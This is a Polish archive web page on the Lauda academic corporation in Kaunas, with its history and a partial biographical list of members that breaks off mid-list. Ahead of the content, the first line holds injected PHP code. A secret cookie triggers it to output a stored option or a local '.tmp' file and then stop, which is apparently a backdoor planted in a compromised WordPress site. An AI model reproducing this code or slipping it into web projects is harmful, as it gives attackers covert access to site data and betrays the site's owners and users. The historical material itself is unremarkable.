if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Lauda

Dekiel Zbigniewa Łukowskiego. Nazwa:
Korporacja Lauda w Kownie
Siedziba:
Kowno
Data powstania:
3 V 1928 r.
Barwy:
granatowa – biała – czerwona (symbolika barw: wierność ideałom - prawda - braterstwo)
Dewiza:
„Braterstwo i Prawda”

Rys historyczny

Banda komersowa (Konrada Łapina), rycerska (Zbigniewa Łukomskiego) i frakowa (Gustawa Matusewicza)
Lauda została utworzona w 1928 r. z inicjatywy mieszkających na Litwie Kowieńskiej członków Korporacji Arkonia z okresu ryskiego. Jako datę założenia przyjęto dzień 3 V 1928 r. tj. dzień zatwierdzenia przez władze uczelni statutu nowej Korporacji. Założycielami byli studenci Uniwersytetu Litewskiego w Kownie narodowości polskiej.

I Komers Laudy, Kowno 1929 r.

Lauda stała na gruncie tzw. idei krajowej, zgodnie z którą mniejszość polska powinna zaakceptować istnienie państwa litewskiego i starać się pokojowo ułożyć stosunki z Litwinami z zachowaniem jednak własnej autonomii. Korporacja miała charakter chrześcijański i odrzucała pojedynki jako formę rozwiązywania sporów honorowych. W kwestii zwyczajów i tradycji korporacyjnych Lauda wzorowała się na swojej korporacji matce - Arkonii. Modyfikacje wynikały z okoliczności, w których Korporacja funkcjonowała - sytuacji mniejszości polskiej na Litwie kowieńskiej oraz niechętnej jej postawie władz litewskich.

Lauda, Kowno 23 I 1931 r.

Lauda, podobnie jak inne korporacje studentów Polaków pochodzących z Litwy Kowieńskiej, była członkiem Związku Polskiej Młodzieży Akademickiej Litwy. Utrzymywała bliskie związki z Samogitią oraz dobre, choć rzadkie kontakty z polskimi korporacjami z terenu Polski, a w szczególności z Arkonią i Konwentem Polonia. W 1938 r. w związku z wejściem w życie na Litwie nowych przepisów Lauda utraciła ze względów formalnych możliwość oficjalnego funkcjonowania. Do czasu wkroczenia na Litwę wojsk sowieckich w czerwcu 1940 r. kontynuowała jednak nieoficjalną działalność.

Zjazd Laudy, Sopot 4 V 1974 r.

Całkowita ustalona, choć niekompletna imienna liczba członków obejmuje 96 nazwisk, w tym będących sui generis członkami honorowymi 41 filistrów Arkonii oraz dwóch członków honorowych sensu stricto.

Lauda w okresie powojennym kontynuowała nieoficjalnie działalność na terenie kraju i urządzała często okolicznościowe zjazdy i komerse. O ile wiadomo odbywały się one w okresie od 1958 do 1979 roku. W 1989 r. Konrad Łapin wydał na prawach rękopisu Wstęgę Laudy. Zarys historii polskiej korporacji na Litwie. Od 2006 r. trwają prace nad reaktywacją K! Lauda. Początkowo prowadziła je K! Magna-Polonia z Poznania, a obecnie Konwent Polonia z Gdańska.

Lista członków

Poniższa, niekompletna lista członków Laudy obejmuje niemal sto nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Kazimierz Janczewski, 1937 r.

 1. Kazimierz Janczewski, (8/20 października 1878 w Blinstrubiszkach w pow. rosieńskim na Żmudzi - 15 lipca 1959 w Pruszkowie) herbu “Dołęga”, s. Kazimierza i Heleny z Oskierków, absolwent Gimnazjum w Rydze 1898, studiował i ukończył prawo Uniwersytet w Petersburgu 1898-1903 oraz rolnictwo na UJ 1903-05, gospodarowal w maj. w Jukojniach w pow. rosieńskim, działacz społeczny, gospodarczy, kulturalny, jeden z liderów mniejszości polskiej na Litwie, członek-założyciel Polskiego Zjednoczenia Demokratycznego, od 1919 przez wiele lat w składzie Rady Miejskiej Kowna, m.in. przewodniczący Rady 1925, prezes Komitetu Polskiego na Litwie, członek-założyciel Towarzystwa Kulturalnego “Pochodnia” oraz filister hnorowy korporacji akademickiej “Lauda”, przewodniczący Polskiego Klubu Sportowego, w czasie okupacji niemieckiej ukrywał się w Szadowie na Litwie, po wkroczeniu wojsk radzieckich na Litwę w 1945 expatriował się do Polski, osiadł w Bytomiu, gdzie pracował w instytucjach państwowych, odznaczony Krzyżem Niepodległości, pochowany na Cmentarzu pod Pruszkowem

  Eugeniusz Römer, 1937 r.

 2. Eugeniusz Römer, (21 września [7 października] 1871 w Cytowianach - 2 maja 1943 w Kujbyszewie) herbu Laski, s. Izydora i Celiny z Przeciszewskich, bratanek Bronisława (Arkonia), wydalony z gimnazjum w Wilnie za mówienie po polsku na ulicy, absolwent gimnazjum w Rydze, studia na Uniwersytecie w Monachium, dr ekonomii, założyciel pierwszego na kowieńszczyźnie “Towarzystwa Rolniczego Rosieńskiego”, polski działacz polityczny i społeczny na Litwie kowieńskiej, jeden z liderów mniejszości polskiej, 17 listopada 1929 mianowany filistrem honorowym Laudy, w czerwcu 1941 wywieziony z żoną do Syktykworu (tajga wołogodzka w północnej Rosji), zmarł w nędzy, pochowany na Cmentarzu w Kujbyszewie (obecnie Samara)

Członkowie rzeczywiści

  Bohdan Afanasjew, 1973 r.

 1. Bohdan (Włodzimierz Bohdan) Afanasjew, (1920 - 17 stycznia 1991 w Olsztynie) absolwent Gimnazjum w Poniewieżu, c. 1936/37 (1939/40), po wojnie osiadł w Olsztynie

 2. Zygmunt Bereśniewicz, (23 października 1866 w Meszkianach w gub. kowieńskiej - 1940 w Mieszkianach), brat Franciszka (Konwent Polonia), s. Jana i Franciszki, uczeń Szkoły Realnej w Mitawie, student i absolwent Wydziału Chemicznego PR 1887-94, przyjęty do Arkonii 1887 (nr ew. 405), gospodarował we własnych dobrach w gub. kowieńskiej, kierownik laboratorium 1897-1900, zastępca zawiadującego, a od 1900 zawiadujący cegielnią w Południowo-Ruskim Dniepropietrowskim Towarzystwie Metalurgicznym, po I wojnie światowej na Litwie kowieńskiej, od 1924 w Mieszkianach, Filister Arkonii i Laudy
 3. Jan Białłozór (Białłozór-Motwid), (23 listopada 1872 - po 1929), z gub. kowieńskiej, uczeń Szkoły Realnej w Wilnie, student Wydziału Handlowego PR 1892-94, przyjęty do Arkonii 1892 (nr ew. 546), właściciel maj. Białłozoryszki w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Jarosław Błusewicz, 1936 r.

 4. Jarosław Błusewicz, (1906 - 1980 w Międzylesiu) absolwent Gimnazjum Polskiego w Wiłkomierzu, student i absolwent med. Uniwersytet Kowieński, c. 1933/34, po studiach praktykował w Birżach, w czasie wojny ukrywał się przed wywózką w głąb ZSRR, po ekspatriacji lekarz powiatowy w Ełku, później osiadł w Międzylesiu (Warszawa), organizator komersów Laudy po wojnie, pochowany na Cmentarzu Północnym w Warszawie

 5. Mieczysław Bohdanowicz-Surwiłło, (22 maja 1894 - po 1929), z gub. kowieńskiej, s. Ferdynanda, uczeń Szkoły Realnej w Poniewieżu, student Wydziału Rolniczego PR 1914-18, przyjęty do Arkonii 1914 (nr ew. 888), po I wojnie światowej właściciel ziemski na Litwie kowieńskiej, Filister Arkonii i Laudy
 6. Stanisław baron Brunnow, (28 stycznia 1859 w maj. Powermeń w gub. kowieńskiej - 1944 ? w Olsztynie), uczeń Gimnazjum w Rydze, student Wydziału Rolniczego PR 1879-87, przyjęty do Arkonii 1879 (nr ew. 111), właściciel majątków Powermeń w gub. kowieńskiej i Rudawa w gub. grodzieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 7. Szymon baron Brunnow, (18 grudnia 1860 w maj. Powermeń w gub. kowieńskiej - 29 stycznia 1930 na Litwie kowieńskiej), uczeń Gimnazjum w Rydze, student Wydziału Rolniczego PR 1882-85, a następnie w Berlinie, przyjęty do Arkonii 1882 (nr ew. 264), właściciel maj. Powermeń, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Stanisław Brzozowski, 1929 r.

 8. Stanisław Brzozowski, (26 lutego 1869 w maj. rodzinnym Szłowiany k. Onikszty na Litwie - 1941 w Kazachstanie ?) s. Gustawa i Jadwigi z Michałowskich, stryj Jana Macieja, Jerzego Stanisława, Zygmunta Szczęsnego (wszyscy Samogitia) oraz Mieczysława (Konwent Polonia), absolwent Szkoły Realnej w Dyneburgu, student w Petersburgu, student i absolwent Wydziału Chemicznego PR 1890-96, przyjęty do Arkonii 1890 (nr ew. 487), technik w Głównym Komitecie Technicznym w Orle, dyrektor zakładów metalurgicznych w Orle, po rewolucji osiedlił się na Litwie kowieńskiej, zakupił maj. Wodokty, pracował w drożdżowni i browarze swego krewniaka Montwiłła w Poniewieżu, jeden z inicjatorów powołania w Kownie Korporacji Lauda oraz żeńskiej Korporacji Znicz, Filister Arkonii i Laudy, aresztowany przez NKWD w czerwcu 1941, zaginął po wywiezieniu do Kazachstanu

 9. Edmund Butkiewicz, i.p. “Plugawy”, lekarz, po wojnie osiadł w Warszawie

  Bohdan Butrym, 1911 r.

 10. Bohdan Butrym, (1 stycznia 1888 - 1941 w Związku Radzieckim) z Wodoktów na Laudzie, syn Antoniego, brat Jerzego (Arkonia, Lauda), uczeń Gimnazjum w Libawie, student Wydziałów Mechanicznego PR 1907-08, Chemicznego 1908-1910 oraz Rolniczego 1910-12, przyjęty do Arkonii 1908 (nr ew. 800), właściciel ziemski, po I wojnie światowej mieszkał na Litwie kowieńskiej, Filister Arkonii i Laudy, aresztowany przez NKWD i wywieziony na Wschód

  Jerzy Butrym

 11. Jerzy Butrym, (1 stycznia 1897 w gminie Nowe Miasto na Litwie - 11 maja 1981 w Londynie) z Wodoktów na Laudzie, s. Antoniego i Zofii z d. Szymkiewicz, brat Bohdana (Arkonia, Lauda), absolwent Szkoły Realnej w Poniewieżu, student Wydziału Rolniczego PR 1914-18, przyjęty do Arkonii 1914 (nr ew. 889), żołnierz Legionów i WP 1918(?)-21, właściciel ziemski, po I wojnie światowej na Litwie kowieńskiej, gospodarował maj. Polesie na Litwie, w latach 30-tych dyrektor Polskiego Banku Wzajemnego Kredytu w Poniewieżu, Filister Arkonii i Laudy, w czasie II wojny światowej wywieziony na roboty do Niemiec, po wojnie na emigracji w Wielkiej Brytanii, pracował jako ogrodnik, a następnie w firmie handlującej winem w Londynie, pochowany na Cmentarzu North Sheen w Londynie

  Kazimierz Bystram, 1931 r.

 12. Kazimierz Bystram, (30 lipca 1887 - 21 lutego 1941 w Wilnie) z Bystrampola k. Poniewieża, s. Władysława i Michaliny z Kamieńskich, brat Tadeusza (Welecja), uczeń Szkoły Realnej w Libawie, student Wydziału Handlowego PR 1897-1900, przyjęty do Arkonii 1897 (nr ew. 665), od 1902 gospodarował we własnym maj. Kurkle w gub. kowieńskiej, a po I wojnie światowej właściciel maj. Bystrampol i Kurkle na Litwie kowieńskiej, Filister Arkonii i Laudy [Źródło (poza wskazanymi poniżej spisu członków): Tomasz Lenczewski, Genealogia Rodów Utytułowanych w Polsce, Warszawa 1996]

  Alfred Charmański, 1890-94.

 13. Alfred Charmański, (6 grudnia 1868 [1867?] w maj. Miedziaty w gub. kowieńskiej - 1951) brat Zygmunta, kuzyn Józefa (obaj Arkonia, Lauda), student i absolwent Wydziału Rolniczego PR 1888-94, przyjęty do Arkonii 1888 (nr ew. 431), od 1894 gospodarował we własnych dobrach Miedziaty, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

 14. Józef Charmański, (31 marca 1873 - po 1938) z gub. kowieńskiej, kuzyn Alfreda i Zygmunta (obaj Arkonia i Lauda), uczeń Szkoły Realnej w Wilnie, student Wydziału Chemicznego PR 1892-95, student i absolwent Wydziału Rolniczeg 1895-1901, przyjęty do Arkonii 1892 (nr ew. 534), pomocnik teksatora w Rządowym Towarzystwie Asekuracyjnym od Ognia w Królestwie Polskim, 1905-08 zarządca maj. rodzinnego Wesołów w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy, w czasie II wojny światowej wywieziony na Syberię, gdzie zmarł

  Zygmunt Charmański, 1938 r.

 15. Zygmunt Charmański, (29 sierpnia 1871 - po 1938), z gub. kowieńskiej, brat Alfreda, kuzyn Józefa (obaj Arkonia i Lauda), uczeń Szkoły Realnej w Rydze, student i absolwent Wydziału Handlowego PR 1892-1900, przyjęty do Arkonii 1892 (nr ew. 535), od 1902 zarządca dóbr Rudowy (Rudowsie) w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

 16. Antoni Chrapowicki, (28 lutego 1867 w Rydze - 1928/29?), z gub. kowieńskiej, uczeń Szkoły Realnej w Mitawie, student Wydziału Mechanicznego PR 1887-92, przyjęty do Arkonii 1887 (nr ew. 408), sekretarz I sem. 1889/90, wiceprezes II sem. (od 25 marca) 1889/90, od 1893 gospodarował we własnych dobrach maj. Terespol w gub. kowieńskiej, właściciel domu handlowego “A.Chrapowicki” w Kiejdanach, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 17. Ignacy Chrapowicki, (9 marca 1884 w Warszawie - 20 września 1939 w Mostach k. Grodna), herbu Gozdawa, z gub. warszawskiej, s. Włodzimierza i Marii z Korwin Kossakowskich, brat Stanisława (Konwent Polonia), uczeń Szkoły Realnej w Warszawie, uczeń i absolwent Szkoły Realnej w Rydze, student Wydziału Rolniczego 1903-06, przyjęty do Arkonii 1903 (nr ew. 767), od 1906 studiował także w szwajcarskim Fryburgu oraz francuskim Nancy (dpl. 1907), polski działacz oświatowy w Szwajcarii (praca wśród robotników sezonowych - nauka czytania i pisania oraz historii Polski), właściciel ziemski, w czasie wojny służył w oddziałach Czerwonego Krzyża, komisarz w polskiej służbie państwowej 1918-19, po I wojnie światowej na Litwie kowieńskiej, właściciel maj. Subocze w pow. grodzieńskim, Filister Arkonii i Laudy, polski działacz oświatowy na Litwie, aresztowany przez NKWD i zamordowany

  Henryk Czarkowski (?), 1931 r.Henryk Czarkowski (?), 1929 r.

 18. Henryk Czarkowski, c. 1928/29

  Franciszek Dakiniewicz, 1938 r.

 19. Franciszek Dakiniewicz, student farmacji, c. 1932/33, i.p. “Dak”, po wojnie pozostał na Litwie

  Eugeniusz Dawidowicz, 1937 r.

 20. Eugeniusz Dawidowicz, (30 września 1913 w Kownie - 22 czerwca 1961 w Warszawie) s. Aleksandra i Stanisławy z d. Czerwińska, brat Juliusza (Lauda), uczeń i absolwent Gimnazjum Polskiego im. A.Mickiewicza 1932, student Wydziału Ekonomicznego UK, c. 1932/33, olderman 1939, mgr ekonomii USB 1944, członek AK podokręgu kowieńskiego (prawd. ps. “Gieniek”), po wkroczeniu Sowietów na Litwę został pełnomocnikiem RP d/s ewakuacji ludności do Polski w urzędzie w Jaszunach, aresztowany w Jaszunach przez NKWD 16 VII 1946, więziony na Łukiszkach, osądzony i skazany na 10 lat łagru przez Trybunał Wojskowy w dniu 10 I 1947, zesłany do łagru w Poćmie (Mordowska ARR) 1947-55, po zwolnieniu zesłany do wsi Petropawłowka k/ Nowpsybirska bez prawa powrotu do rodziny na Litwie, dzięki politycznej “odwilży” z 1956 wrócił do Kowna w maju 1956, w 1957 wraz z córką Aliną przyjechał do Polski do Warszawy. Pracował jako ekonomista księgowy, a potem dyrektor administracyjny w PAN, ciężko chorował na serce, zmarł w wieku 47 lat, pochowany na cmentarzu w podwarszawskim Wilanowie obok grobu brata Juliusza, za działalność w okresie konspiracji odznaczony Złotym Krzyżem Zasługi z Mieczami

  Juliusz Dawidowicz, 1931 r.

 21. Juliusz Dawidowicz, (6 sierpnia 1912 w Kownie (Wilnie ?) - 12 sierpnia 1944 w Starej Bardzie) syn Aleksandra i Stanisławy z d. Czerwińska, brat Eugeniusza (Lauda), uczeń i absolwent Gimnazjum Polskiego im. A.Mickiewicza w Kownie 1921-30, student i absolwent prawa UK 1930-37, c. 1930/31, w czasie studiów pracował w Towarzystwie Ubezpieczeń “Lietuva”, od 1940 pracował i mieszkał w Towarzystwie Ubezpieczeniowym w Nowych Święcianach, w 1941 wywieziony z Litwy w głąb ZSRR (Ałtajski Kraj), od 1943 żołnierz armii Berlinga, porucznik, zginął pod Warką, po ekshumacji pochowany w Wilanowie

 22. Henryk Dłuski, c. 1928/29, wyjechał do Polski przed 1939

  Zygmunt Doborzyński, 1931 r.

 23. Zygmunt Doborzyński, ( - 1939 na Litwie kowieńskiej) c. 1928/29, sekretarz 1932/33

  Edward Dowgiałło-Narbutt, 1927 r.

 24. Edward Dowgiałło-Narbutt, ( - 1944 w Warszawie), student i absolwent WSH 1922-31, przyjęty do Arkonii 1926 (nr ew. 1049), akt. 1926-31, olderman sem. let. 1929/30, mieszkał na Litwie kowieńskiej, Filister Arkonii i Laudy, poległ w Powstaniu Warszawskim

 25. Jan Dowiatt, (12 marca 1881 - koniec 1930 na Litwie kowieńskiej) z gub. kowieńskiej, s. Jerzego, brat Włodzimierza (Arkonia), uczeń Szkoły Realnej w Petersburgu, student Wydziału Architektury PR 1898-99, student i absolwent Wydziału Handlowego 1899-1906, przyjęty do Arkonii 1898 (nr ew. 694), właściciel maj. Dowjatowo w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 26. Andrzej Falewicz, (16 czerwca 1894 w Wilnie - 25 lipca 1976 w Warszawie) z gub. wileńskiej, s. Wojciecha i Teresy z Falewiczów, brat Tadeusza (Arkonia), absolwent Teniszewkiej Szkoły w Sankt Petersburgu, student Wydziału Handlowego PR 1913-15, przyjęty do Arkonii 1913 (nr ew. 876), po I wojnie światowej dzierżawca domeny państwowej Wyciążkowo w woj. poznańskim, oficer WP, członek Związku Ziemian, Filister Arkonii i Laudy

  Czesław Galiński, 1929 r.

 27. Czesław Galiński, ( - zm. w Nałęczowie) założyciel Laudy, pierwszy sekretarz, członek Zarządu polskiego Towarzystwa “Pochodnia” w Kownie, prezes Zarządu Zjednoczenia Polaków Studentów Uniwersytetu Litewskiego, po wojnie mieszkał w Nałęczowie

 28. Piotr Gieduszko, c. 1934/35, pracownik kierownictwa “Pochodni”, aresztowany przez litewską służbę bezpieczeństwa “Sauguma”, w czasie wojny żołnierz AK, od 1942 szeł Wydziału Organizacyjnego przy Pionie Wojskowym Podokręgu Kowno ZWZ-AK

  Franciszek Gintowtt, 1931 r.

 29. Franciszek Gintowtt, c. 1929/30, i.p. “Bazan”, po wojnie pozostał na Litwie

  Antoni Glatman, 1931 r.

 30. Antoni Glatman, c. 1930/31

 31. Włodzimierz Horbaczewski, (30 sierpnia 1909 w Petersburgu - 29 sierpnia 1988 w Londynie), s. Wacława i Katarzyny z d. Jonini, absolwent Gimnazjum im. Adama Mickiewicza w Kownie 1926, student WSH 1926-32, przyjęty do Arkonii 1927 (nr ew. 1071), akt. 1926-33, wiceprezes wewn. sem. zim. 1930/31 i sem. zim. 1931/32, Filister Arkonii i Laudy, ostatni olderman 1944, od czasów studiów pracował w Biurze Sprzedaży i Zarządu Warszawskiego Towarzystwa Kopalń Węgla i Zakładów Hutniczych S.A. w Warszawie, ppor. rez., w wojnie obronnej 1939 w 16 Dywizji Artylerii Ciężkiej, od 1941 w konspiracji w AK, uczestnik Powstania Warszawskiego, po wojnie na emigracji w Wielkiej Brytanii, redaktor “Biuletynu Arkońskiego”, kierował drukarnią i zajmował się handlem

  Lubomir Hryncewicz (?), 1938 r.

 32. Lubomir Hryncewicz, (21 października 1871 w miejsc. Grejcze w gub. kowieńskiej - po 1929) uczeń Szkoły Realnej w Mitawie, student i absolwent Wydziału Mechanicznego 1889-1896, przyjęty do Arkonii 1889 (nr ew. 433), ekspert mechanik Komory Celnej w Rewlu, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Bonawentura Jacewicz, 1936 r.

 33. Bonawentura Jacewicz, ( - zm. w Kownie) c. 1932/33

  Stanisław Jankiewicz, 1937 r.

 34. Stanisław Jankiewicz, (31 stycznia 1911 w maj. rodzinnym Paszkajcie na Litwie kowieńskiej - 10 lipca 1984 w Lubartowie) s. Franciszka i Marii z d. Ulińska, brat Tadeusza (Lauda), student i absolwent med. Uniwersytet w Kownie, c. 1932/33, olderman 1938, chirurg, w czasie wojny na terenie Litwy, m.in. pracował w szpitalu dla rosyjskich jeńców wojennych, po ekspatriacji lekarz w szpitalach w Dąbrowie Górniczej, Szklarskiej Porębie, a od 1948 w Lubartowie, orydnator oddziału chirurgicznego Szpitala Powiatowego w Lubartowie

  Tadeusz Jankiewicz, 1934 r.

 35. Tadeusz Jankiewicz, (2 sierpnia 1909 w maj. rodzinnym Paszkajcie na Litwie kowieńskiej - 25 marca 1994 w Lublinie) s. Franciszka i Marii z d. Ulińska, brat Stanisława (Lauda), absolwent Gimnazjum w Poniewieżu, student i absolwent Wydziału Matematyki Uniwersytetu w Kownie 1930-34, członek Związku Polskiej Młodzieży Akademickiej Litwy, c. 1933/34, po studiach nauczyciel w szkołach, m.in. w Kownie, w czasie wojny w konspiracyjnym nauczaniu polskich dzieci organizowanym przez Towarzystwo „Pochodnia”, od 1946 inspektor Wydziału Oświaty w Obwodzie Kowieńskim i Wiliampolskim, w 1951 zesłany wraz z rodziną na Syberię (obwód tomski, rejon Kargassok), do Polski wrócił w 1956, pracował Centralnym Związku Spółdzielczości Pracy w Lublinie, zasłużony działacz ruchu spółdzielczego w Polsce, od 1989 czynny członek Związku Sybiraków, pochowany na cmentarzu przy ul. Unickiej w Lublinie

 36. Jan Jasieński II, (9 listopada 1872 - po 1929) z gub. kowieńskiej, student Wydziału Handlowego PR 1891-93, przyjęty do Arkonii1891 (nr ew. 494), właściciel ziemski maj. Poniemuń w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Bruno Joczyn, 1974 r.

 37. Bruno Joczyn, (1920 - 1976 w Sopocie) s. Alfonsa, c. 1938/39, w czasie wojny w zarządzie Podokręgu Kowno ZWZ-AK (później Inspektorat E Okręgu AK Wilno), w 1945 w procesie zorganizowanym przez NKWD skazany na 10 lat ciężkich robót, karę odbył w obozie pracy w Inecie pod kołem podbiegunowym, do Polski przyjechał w 1955, osiadł w Sopocie

  Marian Kamiński, 1936 r.

 38. Marian Kamiński, (14 kwietnia 1894 - po 1938) z gub. kowieńskiej, s. Andrzeja, uczeń Szkoły Realnej w Libawie, student Wydziału Rolniczego 1911-18, a następnie Uniwersytetu Łotewskiego 1920, przyjęty do Arkonii 1912 (nr ew. 853), właściciel ziemski, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

 39. Benedykt Karp, (18 lipca 1893 - przed 1929 ?) z Liberyszek k. Kiejdan, s. Józefa, brat Teodora i Maurycego (obaj Arkonia), uczeń Gimnazjum w Rydze, student Wydziału Rolniczego 1911-17 przyjęty do Arkonii 1911 (nr ew. 846), właściciel ziemski, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Gerard Knoch, 1931 r.Gerhard Knoch, 1930 r.

 40. Gerhard Knoch, c. 1930/31, i.p. “Sipulala”, sekretarz Laudy sem. let. 1932/33, w czasie II wojny światowej żołnierz AK, uczestnik operacji “Ostra Brama” w Wilnie 1944, internowany przez NKWD w obozie Miednikach, wywieziony w głąb ZSRR, po wojnie osiadł na Pomorzu Zachodnim

  Bolesław Kobyliński, 1931 r.

 41. Bolesław Kobyliński, (1907 - 1982 w Szczawnie Zdroju) c. 1929/30, sekretarz 1930/31, prawnik

  Zenon Koczan, 1936 r.Zenon Koczan, 1974 r.

 42. Zenon Koczan, (8 lutego 1908 [wg dokumentów, wg rodziny faktycznie ur. 1910] w Butkunach k. Kowna - 15 października 2007 w Olsztynie) s. Bronisława i Heleny z Wążodów, absolwent Gimnazjum Polskiego im. Adama Mickiewicza w Kownie 1930 (?), student med. Uniwersytet Kowieński, student i absolwent agronomii (inż. agronom) Akademii Rolniczej w Datnowie 1936-40, c. sem. zim. 1932/33, członek Towarzystwa Kulturalno-Oświatowego Polaków na Litwie “Pochodnia” oraz koła sportowego “Sparta”, po studiach nauczyciel w szkole, w latach 1932-35 prowadził tajne nauczanie polskich dzieci w Dubinkach, za tą działalność aresztowany, skazany na grzywnę i osadzony w więzieniu 1934, w 1935 zesłany karnie przez władze litewskie do Sałubów nad granicę łotewską, po 1945 w Polsce, osiadł w Olsztynie, pracownik m.in. Centrali Nasiennej, bibliofil, pochowany na cmentarzu komunalnym w Dywitach

 43. Witold hr. Komorowski, (8 stycznia 1875 - po 1929) z gub. kowieńskiej, syn Piotra, brat Antoniego (Arkonia), uczeń Szkoły Realnej w Rydze, student Wydziału Handlowego PR 1896-1902, przyjęty do Arkonii 1896 (nr ew. 647), urzędnik w Towarzystwie “Gwóźdź” w Petersburgu, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Witold Korewa, 1927 r.

 44. Witold Korewa, ( - 20 kwietnia 1976) z Poniewieżyk, student i absolwent (inż. mechanik) PW 1923-32, przyjęty do Arkonii 1926 (nr ew. 1051), akt. 1926-33, Filister Arkonii i Laudy, po wojnie prof. zw. Politechniki Łódzkiej, współtwórca i współautor serii podręczników akademickich Wydawnictwa Naukowo-Technicznego, odznaczony Krzyżem OOP

  Witold Kozaryn, 1931 r.

 45. Witold Kozaryn, c. 1929/30

  Ludwik Krzywobłocki, 1974 r.

 46. Ludwik Krzywobłocki, (1906-1998) po wojnie osiadł w Szczecinie

  Józef Leonowicz, 1937 r.

 47. Józef Leonowicz, (25 września 1910 w Tomsku - 21 kwietnia 1981 w Zielonej Górze) w 1921 wraz z rodziną przyjechał z Syberii na Litwę, absolwent polskiego gimnazjum 1930, student prawa, c. 1930/31, i.p. “Joza”, olderman 1936/37, prezes 1938/39, w 1945 ekspatriował się do Polski, absolwent prawa UMK 1946, adwokat, pracował kolejno w Toruniu, Bydgoszczy i Zielonej Górze, wieloletni dziekan Izby Adwokackiej w Zielonej Górze, tłumacz przysięgły z języków rosyjskiego i litewskiego

  Ignacy Lutyk, 1931 r.

 48. Ignacy Lutyk, (10 maja 1887 - po 1938) z pow. teleszyńskiego w gub. kowieńskiej, s. Stanisława, uczeń Szkoły Realnej w Poniewieżu, student Wydziału Rolniczego PR 1908-15 i Wydziału Chemicznego 1909, przyjęty do Arkonii 1911 (nr ew. 837), po I wojnie światowej właściciel ziemski na Litwie kowieńskiej, Filister Arkonii i Laudy

  Konrad Łapin, 1936 r.Konrad Łapin, 1974 r.

 49. Konrad Łapin, (26 stycznia 1915 w Moskwie - 2 maja 2009 w Sopocie) absolwent Gimnazjum Polskiego im. A. Mickiewicza w Kownie, student polonistyki Kowno i Wilno, c. 1934/35, sekretarz Zarządu Związku Studentów Polaków Uniwersytetu Witolda Wielkiego w Kownie, po ekspatriacji w 1945 w Sopocie, pisarz, poeta i radiowiec (pseud. liter. “Jacek Kasprowy”), od 1956 w Radiu Gdańsk, między innymi na stanowiskach kierownika Redakcji Audycji Satyrycznych i Rozrywkowych, a następnie zastępcy kierownika Redakcji Literackiej, autor powieści, librett do musicali, wierszy, piosenek, kalamburów oraz fraszek, uhonorowany 2005 medalem za zasługi dla Gdańska, autor historii Laudy “Wstęga Laudy”, pochowany na cmentarzu katolickim w Sopocie. Vide także nekrolog: Aktualności 2008

  Zbigniew Łukowski, 1974 r.

 50. Zbigniew Łukowski, (26 maja 1920 w Wiłkomierzu - 12 lutego 2012 w Gdańsku) absolwent Gimnazjum Polskiego w Wiłkomierzu, c. 1935/36, od 1941 żołnierz ZWZ-AK (wywiad), w 1943 aresztowany przez Gestapo, wykupiony przez rodzinę, w 1945 aresztowany przez NKWD, wywieziony do obozu w Donbasie, ukończył studia inżynierskie PG, pracował w Biurze Odbudowy Portów i Biurze Projektów Budownictwa Komunalnego, autor wspomnień pt. “Łagier w Donbasie”, reaktywator Laudy, pochowany na cmentarzu w Gdańsku-Oliwie

  Józef Majewski, 1937 r.

 51. Józef Majewski, (1905-1986? w Sopocie) c. 1928/29, i.p. “Majutek”, red. dziennika “Dzień Kowieński” (później “Dzień Polski”), w czasie wojny kwatermistrz w dowództwie Podokręgu Kowno ZWZ-AK, później “Inspektorat E” Okręgu AK Wilno (”Literat”), po wojnie osiadł w Sopocie

 52. Stefan Maliński, (26 września 1863 w Poniewieżu - po 1929), z Bejnarowa w gub. kowieńskiej, uczeń Gimnazjum Miejskiego w Rydze, student i absolwent Wydziału Rolniczego PR 1883-88, przyjęty do Arkonii 1883 (nr ew. 284), gospodarował w dobrach ojcowskich Bejnarowo w gub. kowieńskiej, dzierżawca wielu dóbr w powiatach szawelskim i poniewieskim, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy (?)

  Antoni Martusewicz, 1936 r. (?).

 53. Antoni Stanisław Martusewicz, (17 stycznia 1917 w maj. rodzinnym Podubisa k. Rosieni - Podubis (Padubysis) na Litwie - 24 kwietnia 1991) s. Kazimierza i Bronisławy z Kociełłów, kuzyn Gustawa (Lauda), absolwent Gimnazjum Polskiego w Poniewieżu, student prawa Kowno, c. 1935/36, od 1944 w Niemczech, po wojnie na emigracji w Australii, właścicielel małej drukarni, fotograf i grafik

  Gustaw Martusewicz, 1931 r.

 54. Gustaw Martusewicz, (1907 - 12 stycznia 1990 w Gdańsku) kuzyn Antoniego (Lauda), student humanistyki, c. 1929/30, artysta fotografik, bibliofil, po wojnie osiadł w Gdańsku

  Marian Micewicz, 1974 r.

 55. Marian Micewicz, c. 1935/36, po wojnie osiadł w Bydgoszczy

  Bohdan Michniewicz, 1936 r.Bohdan Michniewicz, lata 30-te.

 56. Bohdan Michniewicz, ( - lata siedemdziesiąte (?) w Giżycku) c. 1933/34, sekretarz sem. Zim. 1933/34, w okresie wojny w resztówce maj. rodzinnego Wodakle, zmarł tragicznie

  Czesław Mikołajunas, 1931 r.

